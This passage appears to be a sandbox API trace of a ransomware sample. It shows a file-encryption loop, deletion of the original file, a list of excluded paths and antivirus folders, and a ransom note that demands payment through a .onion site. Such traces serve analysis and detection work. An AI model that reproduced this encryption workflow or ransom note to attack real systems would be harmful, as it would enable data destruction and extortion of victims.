lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.403] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.403] GetLastError () returned 0x0 [0159.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.404] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.404] GetLastError () returned 0x0 [0159.405] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.405] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.405] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.405] GetLastError () returned 0x0 [0159.405] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.405] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.405] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.405] GetLastError () returned 0x0 [0159.405] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.405] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.405] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.405] GetLastError () returned 0x0 [0159.405] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.405] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.405] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.405] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui")) returned 0x20 [0159.406] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.406] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 1 [0159.406] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui")) returned 0 [0159.406] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" [0159.406] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 1 [0159.406] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\.xXE204.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\.xxe204.tmp")) returned 0xe204 [0159.445] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\.xXE204.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\.xxe204.tmp"), dwFlags=0x1) returned 0 [0159.445] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\.xXE204.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\.xxe204.tmp")) returned 1 [0159.445] CryptDestroyKey (hKey=0x9ad478) returned 1 [0159.445] wcslen (_String="OK") returned 0x2 [0159.445] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.445] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.445] CryptDestroyKey (hKey=0x9ad238) returned 1 [0159.445] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0159.446] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0159.446] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.446] GetLastError () returned 0x12 [0159.446] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0159.446] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.446] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.447] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.447] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.447] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.447] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.447] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.447] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.447] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.exe") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.dll") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.lnk") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.bat") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.ini") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.msi") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*.scf") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*pagefile.sys*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*AppData*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\winrar\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\java\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\windows\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\ESET\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\AVG\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*Atheros*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*Realtek*") returned 0 [0159.447] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*bootmgr*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*boot*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*boot*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*IO.SYS*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*ntldr*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*chrome*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*opera*") returned 0 [0159.448] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", pszSpec="*firefox*") returned 0 [0159.448] wcslen (_String="\\\\?\\") returned 0x4 [0159.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0159.448] wcscmp (_String1=".", _String2=".") returned 0 [0159.448] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.448] wcscmp (_String1="..", _String2=".") returned 1 [0159.448] wcscmp (_String1="..", _String2="..") returned 0 [0159.448] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.448] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.449] PathMatchSpecW (pszFile="tipresx.dll.mui", 